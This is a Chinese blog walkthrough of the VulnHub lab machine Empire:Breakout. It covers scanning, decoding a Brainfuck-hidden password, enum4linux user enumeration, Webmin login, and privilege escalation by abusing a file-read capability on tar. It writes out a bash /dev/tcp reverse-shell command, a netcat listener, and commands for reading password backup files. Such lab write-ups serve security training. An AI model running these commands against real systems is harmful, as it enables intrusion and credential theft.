vulnhub——Empire:Breakout

最新推荐文章于 2024-08-06 17:12:28 发布
最新推荐文章于 2024-08-06 17:12:28 发布
阅读量562 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Re1_zf/article/details/127729170
版权

一、概要

靶机:192.168.1.101
攻击机:192.168.1.113
靶机下载地址:https://download.vulnhub.com/empire/02-Breakout.zip

二、主机发现

arp-scan扫描一下主机

netdiscover扫描也可以

 

三、信息收集 

nmap扫描一下,开放了5个端口

依次访问一下看看服务

登录一下80端口查看一下

四、解密

页面时apache的默认页面,查看一下源码,在最下面看到了一串密文

don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

别担心没有人会到达这里,与你分享我的访问权限是安全的。其加密:)

ook解密一下

.2uqPEfj3D<P'a-3

根据上面的注释的提示

得到的这串字符串应该是密码 

访问一下其他端口看有没有用户名相关信息或者登录框啥的

10000端口是个登录框

20000端口也是个登录框

看上去这两个,前面那个应该是管理员的登录框,后面这个是普通用户的登录框

五、enum4linux获取用户名

尝试获取一下用户名

139和445都是文件共享服务

尝试使用enum4linux枚举信息

如果扫不了的话,可以尝试装一下samba组件

直接sudo apt install samba就可以了

扫出来一个用户名cyber

用扫出来的这些用户名和密码去尝试登录一下前面发现的两个登录框

10000端口的登录失败

20000端口的这个登录成功

左下角有一个终端命令,可以直接获取终端

 拿到第一个flag

 

六、提权

本来想使用sudo -l查看一下可以运行的程序

但是没有sudo 命令

查找suid权限程序提权

find / -perm -u=s -type f 2>/dev/null

在这里检索一下,没有发现可用的程序(GTFOBins

在用户目录下查看文件可以发现一个二进制的文件tar

查看一下它的capabilities和suid程序

查询当前目录下tar文件的功能

getcap tar

 

递归查询发现两个文件getcap -r / 2>/dev/null

 

前面这个文件的功能允许读取任何文件

由此,可以使用tar读取一些敏感文件

find / -name '*pass*' 2>/dev/null

除了常规的passwd文件外,还找到了一个备份文件

可以尝试使用tar命令压缩再解压一下,这样就可以避免这个文件的权限问题了

但是需要注意一定要是使用./tar,否则使用的就是全局tar,全局tar无权限使用,目录下的tar命令是有上面说的读取任意文件的功能的

在当前用户目录下使用tar命令的-cf功能压缩一下目标文件为bak.tar

使用-xf参数解压压缩包

使用cat命令读取当前目录下的var/backups/.old_pass.bak,而不是根目录那个,两个权限是不一样的

/var/backups那个目录下的文件是没有权限读取的

当前目录下解压出来的这个var/backups目录下的才有权限

当前的这个控制台认证时间太短

反弹一下shell

七、反弹shell

先在攻击机上监听端口

nc -lvp 4444

再在靶机上反弹shell 

bash -c 'bash -i >& /dev/tcp/192.168.1.113/4444 0>&1'

 使用python切换一下终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

su root切换一下root权限,获得flag

Re1_zf
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
02-Breakout靶机实战思路总结(读取任意文件提权,smb协议,Enum4linux)
qq_39641273的博客
06-12 397
这个主机不算很难,对于新手难度适中,可以尝试练手,如果没有思路本篇文档可供参考。知识点:smb协议,Enum4linux,文件任意读取,brainfuck编码。
靶机渗透练习42-Empire Breakout
hirak0的博客
04-19 2342
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-breakout,751/ Description Difficulty: Easy This box was created to be an Easy box, but it can be Medium if you get lost. For hints discord Server ( https://discord.gg/7asvAhCEhe ) 一、搭建靶机环境 攻击机Kali: IP地址:192
02-Breakout vulnhub靶场(tar命令,反弹shell笔记)
weixin_62621015的博客
03-19 302
02-Breakout vulnhub靶场个人通关记录
02-breakout靶机实验实战演练
lianliandad的博客
11-10 904
好好好好
[Vulnhub]Empire: Breakout
qq_63923205的博客
02-24 153
最近感觉ctf打的很空虚,就开始刷vulnhub了,希望能把自己渗透力给提升提升()
Empire:RDF的JPA实施
04-25
Empire使用为数据库提供了标准的样式接口。 我们对Empire的迫切需求是能够构建RDF支持的Web应用程序,包括 ,同时与JPA / Hibernate风格的RDBMS接口兼容。 Empire的主要设计目标是实现尽可能多的JPA API,以便...
altus-empire:MERN专案
04-01
5. **文件结构**:"altus-empire-main"很可能包含了项目的源代码文件,如服务器端的`server.js`或`app.js`(Node.js入口文件),客户端的`index.js`(React应用的入口点),以及`package.json`(项目依赖和配置)。...
Empire:一个基于Docker和亚马逊ECS的自托管PaaS
02-26
但当我们不断壮大,问题和瓶颈频现,为此我们开始寻求解决之道,首先关注的是开源社区中支持Docker的平台,如Flynn、Deis、CoreOS、Kubernetes等,但都不理想,后通过使用亚马逊ECS,最后确定了Empire,用Empire完成...
Empire: Total War modding tools-开源
04-28
首先,"Empire: Total War modding tools"提供的GUI应用程序让玩家能够更直观地操作和修改游戏资源。它具有四个主要功能: 1. **添加文件**:允许玩家将自定义的模型、纹理、音效等资源导入到游戏中,创建独特的...
vulnhub靶机22 02-Breakout.zip
linxaiomo
08-02 594
简单的渗透测试靶机,适合初级学习者,解题思路完整,推荐阅读学习,交流讨论。
Empire: Breakout
Forever_Han13的博客
04-04 563
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CST Nmap scan report for 192.168.0.1 Host is up (0.00054s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report fo
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1094
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
靶机练习 No.22 Vulnhub靶机 Breakout samba,webmin,tar提权
YouthBelief的博客
01-24 3839
0x00 环境准备 靶机下载 https://www.vulnhub.com/entry/empire-breakout,751/ 启动方式 VMware 启动 版本信息 Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire 靶机描述 Difficulty: Easy This box was created to be an E
OpenGL学习笔记一之实战篇三 2D游戏(Breakout)之简介
飞飞飞的博客
05-10 2245
转载自https://learnopengl-cn.github.io/06%20In%20Practice/2D-Game/01%20Breakout/ 看完前面的教程之后我们已经了解了非常多的OpenGL内部工作原理,并且我们已经能够用这些知识绘制一些复杂的图形。然而,除了之前的几个技术演示之外,我们还没有真正利用OpenGL开发一个实际应用。这篇教程为OpenGL 2D游戏制作系列教程的...
Vulnhub靶场】Breakout
Nailaoyyds的博客
06-17 705
目录前言一、信息收集0x00 arp-scan扫描0x01 nmap扫描0x02 dirsearch扫描二、漏洞利用0x01 webmin 远程代码漏洞0x02 Brainfuck0x03 enum4linux0x04 反弹shell0x05 搜集信息三、提权0x00 tar利用 总结 arp-scan -I eth1 -l https://192.168.56.101:10000 https://192.168.56.101:20000 二者页面一致 正常页面 未发现webmin源码内
vulnhub EMPIRE: BREAKOUT靶机
小小猪的博客
08-30 695
/tar -cvf pass.tar /var/backups/.old_pass.bak (注:此处使用./tar 表示使用此目录的tar文件)开启了smb服务,enum4linux 192.168.226.129收集更多信息,web指纹页面收集也可以,收集到用户名。直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就可以顺利读取了。经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak。再次查看,即可查看到root密码。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8375
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 902
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
最新发布
m0_57291352的博客
08-06 931
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值